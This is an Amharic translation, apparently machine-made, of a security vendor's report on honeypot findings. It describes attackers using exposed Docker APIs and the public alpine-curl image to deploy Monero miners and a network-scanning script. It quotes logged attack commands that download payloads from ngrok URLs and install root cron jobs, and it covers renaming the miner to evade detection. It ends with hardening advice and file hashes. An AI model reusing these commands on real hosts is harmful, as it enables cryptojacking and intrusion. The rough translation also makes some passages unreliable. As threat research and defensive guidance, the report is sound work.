ፕሮሆስተር > ጦማር > አስተዳደር > የግል ያልሆነው Docker API እና ከህብረተሰቡ የተውጣጡ ህዝባዊ ምስሎች የክሪፕቶፕ ማዕድን ማውጫዎችን ለማሰራጨት እንዴት ጥቅም ላይ እንደሚውሉ

የግል ያልሆነው Docker API እና ከህብረተሰቡ የተውጣጡ ህዝባዊ ምስሎች የክሪፕቶፕ ማዕድን ማውጫዎችን ለማሰራጨት እንዴት ጥቅም ላይ እንደሚውሉ

የግል ያልሆነው Docker API እና ከህብረተሰቡ የተውጣጡ ህዝባዊ ምስሎች የክሪፕቶፕ ማዕድን ማውጫዎችን ለማሰራጨት እንዴት ጥቅም ላይ እንደሚውሉ

ስጋቶችን ለመከታተል የፈጠርነውን የ honeypot ኮንቴይነሮችን በመጠቀም የተሰበሰበውን መረጃ ተንትነናል። እና በDocker Hub ላይ በማህበረሰብ የታተመ ምስል በመጠቀም ያልተፈለጉ ወይም ያልተፈቀዱ የክሪፕቶፕ ማዕድን አውጪዎች እንደ ወንበዴ ኮንቴይነሮች ከተሰማሩ ጉልህ እንቅስቃሴ አግኝተናል። ምስሉ ተንኮል አዘል ክሪፕቶፕ ማዕድን አውጪዎችን የሚያቀርብ አገልግሎት አካል ሆኖ ያገለግላል።

በተጨማሪም ከአውታረ መረቦች ጋር ለመስራት ፕሮግራሞች ተጭነዋል ክፍት ጎረቤት ኮንቴይነሮች እና አፕሊኬሽኖች ውስጥ ዘልቀው ለመግባት.

ያለ ምንም የደህንነት እርምጃዎች ወይም ተጨማሪ ሶፍትዌሮች ሳይጫኑ የእኛን የጫጉላ ማስቀመጫዎች ልክ እንደ ነባሪ ቅንጅቶች እንተዋለን። እባክዎን ዶከር ስህተቶችን እና ቀላል ተጋላጭነቶችን ለማስወገድ ለመጀመሪያ ጊዜ ለማዋቀር ምክሮች እንዳሉት ልብ ይበሉ። ነገር ግን ጥቅም ላይ የሚውሉት የማር ማሰሮዎች ኮንቴይነሮች ናቸው፣ በመያዣው መድረክ ላይ ያነጣጠሩ ጥቃቶችን ለመለየት የተነደፉ እንጂ በመያዣው ውስጥ ያሉ መተግበሪያዎች አይደሉም።

የተገኘዉ ተንኮል-አዘል ተግባር ተጋላጭነትን የማይፈልግ እና እንዲሁም ከዶከር ሥሪት የጸዳ ስለሆነ የሚታወቅ ነዉ። በስህተት የተዋቀረ እና ክፍት የሆነ የመያዣ ምስል ማግኘት አጥቂዎች ብዙ ክፍት አገልጋዮችን ለመበከል የሚያስፈልጋቸው ብቻ ነው።

ያልተዘጋው Docker API ተጠቃሚው ሰፋ ያለ ስራ እንዲሰራ ያስችለዋል። ቡድኖች, የማስኬጃ መያዣዎችን ዝርዝር ማግኘትን ጨምሮ, ከአንድ የተወሰነ ኮንቴይነር ምዝግብ ማስታወሻዎችን ማግኘት, መጀመር, ማቆም (ግዳጅ ጨምሮ) እና እንዲያውም ከተወሰኑ ቅንብሮች ጋር ከተወሰነ ምስል አዲስ መያዣ መፍጠር.

የግል ያልሆነው Docker API እና ከህብረተሰቡ የተውጣጡ ህዝባዊ ምስሎች የክሪፕቶፕ ማዕድን ማውጫዎችን ለማሰራጨት እንዴት ጥቅም ላይ እንደሚውሉ
በግራ በኩል የማልዌር ማቅረቢያ ዘዴ ነው. በስተቀኝ በኩል ምስሎችን ከርቀት ለማውጣት የሚያስችል የአጥቂው አካባቢ ነው።

የግል ያልሆነው Docker API እና ከህብረተሰቡ የተውጣጡ ህዝባዊ ምስሎች የክሪፕቶፕ ማዕድን ማውጫዎችን ለማሰራጨት እንዴት ጥቅም ላይ እንደሚውሉ
በ 3762 ክፍት Docker APIs አገር ስርጭት። በ12.02.2019/XNUMX/XNUMX በሾዳን ፍለጋ ላይ የተመሰረተ

የጥቃት ሰንሰለት እና የመጫኛ አማራጮች

ተንኮል-አዘል እንቅስቃሴ በማር ማሰሮዎች እርዳታ ብቻ ሳይሆን ተገኝቷል። የሞኔሮ ክሪፕቶፕ ማይኒንግ ሶፍትዌሮችን ለማሰማራት እንደ ድልድይ ጥቅም ላይ የዋለ ኮንቴይነርን ከመረመርን በኋላ የተጋለጡ Docker APIs (ሁለተኛ ግራፍ ይመልከቱ) ከሾዳን የተገኘው መረጃ ያሳያል። ባለፈው ዓመት ኦክቶበር (2018, የአሁኑ ውሂብ ይህን መምሰል ትችላለህ በግምት ተርጓሚ) 856 ክፍት ኤፒአይዎች ብቻ ነበሩ።

የ honeypot ምዝግብ ማስታወሻዎች ምርመራ እንደሚያሳየው የመያዣ ምስል አጠቃቀምም ከመጠቀም ጋር የተያያዘ ነው ngrokደህንነታቸው የተጠበቁ ግንኙነቶችን ለመመስረት ወይም ትራፊክን በይፋ ከሚደረስባቸው ነጥቦች ወደተገለጹ አድራሻዎች ወይም ምንጮች (ለምሳሌ localhost) ለማስተላለፍ መሳሪያ ነው። ይህ አጥቂዎች የክፍያ ጭነት ወደ ክፍት አገልጋይ ሲያደርሱ በተለዋዋጭ ዩአርኤሎችን እንዲፈጥሩ ያስችላቸዋል። ከዚህ በታች የ ngrok አገልግሎትን አላግባብ መጠቀምን ከሚያሳዩ የምዝግብ ማስታወሻዎች ውስጥ የኮድ ምሳሌዎች አሉ።

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

እንደምታየው፣ የተሰቀሉት ፋይሎች የሚወርዱት በየጊዜው ከሚለዋወጡ ዩአርኤሎች ነው። እነዚህ ዩአርኤሎች አጭር የማለቂያ ቀን አላቸው፣ ስለዚህ ክፍያው ካለቀበት ቀን በኋላ ሊወርድ አይችልም።

ሁለት የመጫኛ አማራጮች አሉ። የመጀመሪያው ለሊኑክስ (እንደ Coinminer.SH.MALXMR.ATNO ተብሎ የተገለፀው) ከማዕድን ገንዳ ጋር የሚያገናኘው ELF ማዕድን ማውጫ ነው። ሁለተኛው ስክሪፕት ነው (TrojanSpy.SH.ZNETMAP.A) የኔትወርክ ክልሎችን ለመቃኘት እና ከዚያም አዳዲስ ኢላማዎችን ለመፈለግ የሚያገለግሉ የተወሰኑ የኔትወርክ መሳሪያዎችን ለማግኘት የተነደፈ ነው።

የ dropper ስክሪፕት ሁለት ተለዋዋጮችን ያስቀምጣል, ከዚያም ምስጠራ ማዕድን ማውጫውን ለማሰማራት ያገለግላሉ. የHOST ተለዋዋጭ ተንኮል አዘል ፋይሎቹ የሚገኙበትን ዩአርኤል ይዟል፣ እና RIP ተለዋዋጭ የሚሰማራው የማዕድን ማውጫው የፋይል ስም (በእውነቱ፣ ሃሽ) ነው። የHOST ተለዋዋጭ የሃሽ ተለዋዋጭ በተለወጠ ቁጥር ይቀየራል። ስክሪፕቱ ሌላ ምንም cryptocurrency ቆፋሪዎች በተጠቃው አገልጋይ ላይ እየሰሩ አለመሆናቸውን ለማረጋገጥ ይሞክራል።

የግል ያልሆነው Docker API እና ከህብረተሰቡ የተውጣጡ ህዝባዊ ምስሎች የክሪፕቶፕ ማዕድን ማውጫዎችን ለማሰራጨት እንዴት ጥቅም ላይ እንደሚውሉ
የHOST እና RIP ተለዋዋጮች ምሳሌዎች፣እንዲሁም ሌላ የማዕድን ቆፋሪዎች እየሰሩ አለመሆኑን ለማረጋገጥ የሚያገለግል ኮድ ቅንጭብ

ማዕድን ማውጣት ከመጀመሩ በፊት, ወደ nginx ተቀይሯል. የዚህ ስክሪፕት ሌሎች ስሪቶች የማዕድን ማውጫውን በሊኑክስ አከባቢዎች ውስጥ ወደሚገኙ ሌሎች ህጋዊ አገልግሎቶች ይሰይሙታል። ይህ አብዛኛውን ጊዜ ቼኮችን ከአሂድ ሂደቶች ዝርዝር ጋር ለማለፍ በቂ ነው።

የፍለጋ ስክሪፕት እንዲሁ ባህሪያት አሉት. አስፈላጊዎቹን መሳሪያዎች ለማሰማራት ከተመሳሳይ የዩአርኤል አገልግሎት ጋር ይሰራል. ከነሱ መካከል የ zmap binary ነው, እሱም አውታረ መረቦችን ለመፈተሽ እና ክፍት የሆኑ ወደቦችን ዝርዝር ለማግኘት ያገለግላል. ስክሪፕቱ ከተገኙት አገልግሎቶች ጋር ለመግባባት እና ባነሮችን ለመቀበል የሚያገለግል ሌላ ሁለትዮሽ ይጭናል ስለ የተገኘው አገልግሎት ተጨማሪ መረጃ ለማወቅ (ለምሳሌ ሥሪቱ)።

ስክሪፕቱ እንዲሁ ለመቃኘት አንዳንድ የአውታረ መረብ ክልሎችን አስቀድሞ ይወስናል፣ ነገር ግን ይህ በስክሪፕቱ ስሪት ላይ የተመሰረተ ነው። እንዲሁም ፍተሻውን ከማካሄድዎ በፊት የታለሙ ወደቦችን ከአገልግሎቶቹ ያዘጋጃል-በዚህ አጋጣሚ Docker።

በተቻለ ፍጥነት ኢላማዎች ሲገኙ ባነሮች በራስ-ሰር ከነሱ ይወገዳሉ። ስክሪፕቱ እንዲሁ በአገልግሎቶቹ፣ መተግበሪያዎች፣ አካላት ወይም የፍላጎት መድረኮች ላይ በመመስረት ኢላማዎችን ያጣራል፡ Redis፣ Jenkins፣ Drupal፣ MODX፣ ኩበርኔትስ ማስተር፣ Docker 1.16 ደንበኛ እና Apache CouchDB። የተቃኘው አገልጋይ ከአንዳቸው ጋር የሚዛመድ ከሆነ፣ በጽሑፍ ፋይል ውስጥ ተቀምጧል፣ ይህም አጥቂዎች በኋላ ላይ ለቀጣይ ትንተና እና ጠለፋ ሊጠቀሙበት ይችላሉ። እነዚህ የጽሑፍ ፋይሎች በተለዋዋጭ አገናኞች ወደ አጥቂዎቹ አገልጋዮች ይሰቀላሉ። ማለትም ለእያንዳንዱ ፋይል የተለየ ዩአርኤል ጥቅም ላይ ይውላል፣ ይህ ማለት ቀጣይ መዳረሻ አስቸጋሪ ነው።

የጥቃት ቬክተር በሚቀጥሉት ሁለት የኮድ ቁርጥራጮች ላይ እንደሚታየው የዶከር ምስል ነው።

የግል ያልሆነው Docker API እና ከህብረተሰቡ የተውጣጡ ህዝባዊ ምስሎች የክሪፕቶፕ ማዕድን ማውጫዎችን ለማሰራጨት እንዴት ጥቅም ላይ እንደሚውሉ
ከላይ ወደ ህጋዊ አገልግሎት እየተሰየመ ነው፣ እና ከታች ደግሞ zmap አውታረ መረቦችን ለመቃኘት እንዴት ጥቅም ላይ እንደሚውል ነው።

የግል ያልሆነው Docker API እና ከህብረተሰቡ የተውጣጡ ህዝባዊ ምስሎች የክሪፕቶፕ ማዕድን ማውጫዎችን ለማሰራጨት እንዴት ጥቅም ላይ እንደሚውሉ
ከላይ አስቀድሞ የተገለጹ የአውታረ መረብ ክልሎች አሉ፣ ከታች ደግሞ ዶከርን ጨምሮ አገልግሎቶችን ለመፈለግ የተወሰኑ ወደቦች አሉ።

የግል ያልሆነው Docker API እና ከህብረተሰቡ የተውጣጡ ህዝባዊ ምስሎች የክሪፕቶፕ ማዕድን ማውጫዎችን ለማሰራጨት እንዴት ጥቅም ላይ እንደሚውሉ
ቅጽበታዊ ገጽ እይታው እንደሚያሳየው የአልፕስ-ከርል ምስል ከ10 ሚሊዮን ጊዜ በላይ ወርዷል

በአልፓይን ሊኑክስ እና ከርል ላይ በመመስረት ፋይሎችን በተለያዩ ፕሮቶኮሎች ለማስተላለፍ ከንብረት ቆጣቢ CLI መሳሪያ መገንባት ይችላሉ Docker ምስል. ባለፈው ምስል ላይ እንደሚታየው ይህ ምስል ቀድሞውኑ ከ 10 ሚሊዮን ጊዜ በላይ ወርዷል. ብዙ ቁጥር ያላቸው ማውረዶች ይህንን ምስል እንደ መግቢያ ነጥብ መጠቀም ማለት ሊሆን ይችላል፤ ይህ ምስል ከስድስት ወራት በፊት ተዘምኗል፤ ተጠቃሚዎች ሌሎች ምስሎችን ከዚህ ማከማቻ ብዙ ጊዜ አላወረዱም። በዶከር ውስጥ የመግቢያ ነጥብ - መያዣውን ለማስኬድ ለማዋቀር የሚያገለግል መመሪያ ስብስብ። የመግቢያ ነጥብ ቅንጅቶች ትክክል ካልሆኑ (ለምሳሌ, መያዣው ከበይነመረቡ ክፍት ነው), ምስሉ እንደ ማጥቃት ቬክተር ሊያገለግል ይችላል. አጥቂዎች ያልተዋቀረ ወይም ያልተደገፈ ክፍት መያዣ ካገኙ ክፍያን ለማድረስ ሊጠቀሙበት ይችላሉ።

ይህ ምስል (alpine-curl) እራሱ ተንኮል አዘል እንዳልሆነ ልብ ሊባል የሚገባው ነው, ነገር ግን ከላይ እንደሚታየው, ተንኮል አዘል ተግባራትን ለማከናወን ጥቅም ላይ ሊውል ይችላል. ተመሳሳይ የዶከር ምስሎች ተንኮል አዘል እንቅስቃሴዎችን ለማከናወን ጥቅም ላይ ሊውሉ ይችላሉ. ዶከርን አግኝተን በዚህ ጉዳይ ላይ ከእነሱ ጋር ሠርተናል።

ምክሮች

ትክክል ያልሆነ ቅንብር አጽም የማያቋርጥ ችግር ለብዙ ኩባንያዎች, በተለይም ለሚተገበሩ DevOps, ፈጣን ልማት እና አቅርቦት ላይ ያተኮረ. ሁሉም ነገር የኦዲት እና የክትትል ደንቦችን ማክበር, የመረጃ ሚስጥራዊነትን የመቆጣጠር አስፈላጊነት እና እንዲሁም አለመታዘዛቸውን በሚያስከትል ከፍተኛ ጉዳት ምክንያት ሁሉም ነገር ተባብሷል. የደህንነት አውቶሜትሽን በእድገት የህይወት ኡደት ውስጥ ማካተት የደህንነት ጉድጓዶችን እንድታገኝ ብቻ ሳይሆን ሊታወቁ የሚችሉ ክፍተቶችን እንድታገኝ ብቻ ሳይሆን አላስፈላጊ የስራ ጫናዎችን እንድትቀንስም ያግዝሃል፣ ለምሳሌ ተጨማሪ ሶፍትዌሮችን ማስኬድ ለእያንዳንዱ የተገኘ ተጋላጭነት ወይም አፕሊኬሽን ከዋለ በኋላ የተሳሳተ ውቅር መፍጠር።

በዚህ ርዕስ ውስጥ የተብራራው ክስተት የሚከተሉትን ምክሮች ጨምሮ ደህንነትን ከመጀመሪያው ጀምሮ ግምት ውስጥ ማስገባት አስፈላጊ መሆኑን ያሳያል.

  • ለስርዓት አስተዳዳሪዎች እና ገንቢዎች፡- ሁሉም ነገር ከአንድ አገልጋይ ወይም ከውስጥ አውታረ መረብ የሚመጡ ጥያቄዎችን ለመቀበል ብቻ መዋቀሩን ለማረጋገጥ ሁልጊዜ የእርስዎን የኤፒአይ ቅንብሮች ያረጋግጡ።
  • የአነስተኛ መብቶችን መርህ ይከተሉ፡ የመያዣ ምስሎች መፈረማቸውን እና መረጋገጡን፣ ወሳኝ ክፍሎችን መድረስን ይገድቡ (የኮንቴይነር ማስጀመሪያ አገልግሎት) እና ምስጠራን ወደ አውታረ መረብ ግንኙነቶች ያክሉ።
  • ተከተል ምክሮች እና የደህንነት ዘዴዎችን ማንቃት, ለምሳሌ. ከዶከር እና አብሮ የተሰራ የደህንነት ባህሪዎች.
  • በመያዣው ውስጥ ስለሚከናወኑ ሂደቶች ተጨማሪ መረጃ ለማግኘት የሩጫ ጊዜዎችን እና ምስሎችን በራስ ሰር መቃኘትን ይጠቀሙ (ለምሳሌ ፣ መፈልፈልን ለመለየት ወይም ተጋላጭነትን ለመፈለግ)። የመተግበሪያ ቁጥጥር እና የታማኝነት ክትትል በአገልጋዮች፣ ፋይሎች እና የስርዓት አካባቢዎች ላይ ያልተለመዱ ለውጦችን ለመከታተል ይረዳል።

Trendmicro DevOps ቡድኖች ደህንነቱ በተጠበቀ ሁኔታ እንዲገነቡ፣ በፍጥነት እንዲለቁ እና የትም እንዲጀምሩ ያግዛል። Trend ማይክሮ ድብልቅ የደመና ደህንነት በድርጅቱ የዴቭኦፕስ ቧንቧ መስመር ላይ ኃይለኛ፣ የተስተካከለ እና አውቶሜትድ ደህንነትን ያቀርባል እና በርካታ የአደጋ መከላከያዎችን ይሰጣል። XGen በሂደት ጊዜ አካላዊ፣ ምናባዊ እና የደመና የስራ ጫናዎችን ለመጠበቅ። እንዲሁም የመያዣ ደህንነትን ይጨምራል ጥልቅ ደህንነት и ጥልቅ ደህንነት ስማርት ቼክየዶከር ኮንቴይነር ምስሎችን ለማልዌር እና ተጋላጭነቶችን በማንኛውም የእድገት መስመር ላይ በመቃኘት አደጋ ከመሰማራታቸው በፊት ለመከላከል።

የስምምነት ምልክቶች

ተዛማጅ ሃሽ

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

በ Docker የቪዲዮ ኮርስ የተለማመዱ ተናጋሪዎች እድሉን ለመቀነስ ወይም ከላይ የተገለፀውን ሁኔታ ሙሉ በሙሉ ለማስወገድ በመጀመሪያ ምን መቼቶች መደረግ እንዳለባቸው ያሳያሉ። እና ከኦገስት 19-21 በመስመር ላይ የተጠናከረ DevOps መሳሪያዎች እና ማጭበርበር እነዚህን እና መሰል የደህንነት ችግሮችን ከስራ ባልደረቦች እና ከተለማመዱ አስተማሪዎች ጋር በክብ ጠረጴዛ ላይ መወያየት ትችላላችሁ።

ምንጭ: hab.com

አስተያየት ያክሉ